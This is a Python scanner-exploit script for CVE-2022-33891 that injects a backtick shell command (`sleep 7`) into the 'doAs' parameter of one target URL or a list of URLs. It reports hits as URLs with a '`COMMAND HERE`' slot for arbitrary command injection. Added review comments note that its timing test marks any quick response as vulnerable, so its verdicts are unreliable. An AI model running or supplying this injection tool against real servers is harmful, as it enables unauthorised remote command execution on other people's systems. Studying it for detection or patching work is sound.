import requests
import argparse
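def banner():
    """Print the coloured ASCII-art banner and the author credit line.

    The art is kept in a raw string because it is full of backslashes
    (``\\ ``, ``\\/``, ``\\_``) that are not valid escape sequences; in a
    normal literal they trigger a SyntaxWarning on recent Python versions.
    The ANSI colour codes stay in ordinary literals so ``\\033`` still
    becomes the ESC byte. The printed bytes are unchanged.
    """
    blue = '\033[0;34m'
    white = '\033[0;37m'
    art = r"""
_____ _ _ _____ _____ _____ _____ _____ _____ _____ _____ _____ __
/ __ \ | | | ___| / __ \| _ |/ __ \/ __ \ |____ ||____ | _ || _ |/ |
| / \/ | | | |__ ______`' / /'| |/' |`' / /'`' / /'______ / / / /\ V / | |_| |`| |
| | | | | | __|______| / / | /| | / / / / |______| \ \ \ \/ _ \ \____ | | |
| \__/\ \_/ / |___ ./ /___\ |_/ /./ /___./ /___ .___/ /.___/ / |_| |.___/ /_| |_
\____/\___/\____/ \_____/ \___/ \_____/\_____/ \____/ \____/\_____/\____/ \___/
"""
    print(f'{blue}{art}{blue}[{white}Script coded by Amolo Hunters{blue}]\n')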
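def urlexploit(url):
    """Probe a single URL for CVE-2022-33891 and print one verdict line.

    Sends one GET request to *url* with the ``doAs`` query parameter used
    by the original script and classifies the target from the response
    time alone. When the ``--valid`` flag is set, the "Not vulnerable"
    line is suppressed; the "Vulnerable" and error lines are always shown.

    Args:
        url: Base URL of the target; the query string is appended as-is.

    Reads the module-level ``arguments`` namespace for the ``valid`` flag.
    """
    only_valid = arguments.valid
    try:
        # NOTE(review): verify=False turns off TLS certificate validation, so
        # over HTTPS the answering host is not authenticated and the timing
        # may belong to an intermediary rather than the intended server.
        r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit; Exception keeps the best-effort behaviour but lets the
        # operator stop the run.
        print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
        return

    # NOTE(review): the verdict is a single response-time threshold. Any
    # response that arrives within 8 seconds satisfies this condition,
    # including one from a host that ignores the parameter, so a "[+]" line
    # is not confirmation. Validate findings against the installed version
    # and the vendor advisory for this CVE before acting on them.
    if r.elapsed.total_seconds() <= 8:
        print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
    elif not only_valid:
        print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')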
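def listexploit(file):
    """Run the single-URL check on every non-empty line of *file*.

    The original body repeated the request/verdict code in both branches of
    ``if arguments.valid`` with identical output, so ``--valid`` had no
    effect in list mode. Delegating to ``urlexploit`` removes the
    duplication and makes list mode honour ``--valid`` the same way
    single-URL mode does.

    Args:
        file: Path to a text file containing one target URL per line.
    """
    # The context manager closes the handle; the original never closed it.
    with open(file, 'r') as handle:
        targets = handle.read().splitlines()

    for url in targets:
        if not url.strip():
            # A blank line would otherwise be sent as a request with no host
            # and only produce an error line.
            continue
        urlexploit(url)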
def main():
    """Show the banner, then run whichever target modes were requested.

    Reads the module-level ``arguments`` namespace: ``turl`` selects the
    single-URL check and ``tlist`` the file-of-URLs check. Both run when
    both are given; neither runs when neither is given.
    """
    banner()

    single_target = arguments.turl
    if single_target:
        urlexploit(single_target)

    target_file = arguments.tlist
    if target_file:
        listexploit(target_file)
if __name__ == '__main__':
    # ``arguments`` must stay a module-level name: the functions above read
    # it as a global instead of receiving it as a parameter.
    cli = argparse.ArgumentParser()
    cli.add_argument('-u', '--url', dest='turl', help='target url')
    cli.add_argument('-l', '--list', dest='tlist', help='targets list')
    cli.add_argument(
        '-v', '--valid',
        dest='valid',
        action='store_true',
        help='only valid targets',
    )
    arguments = cli.parse_args()
    main()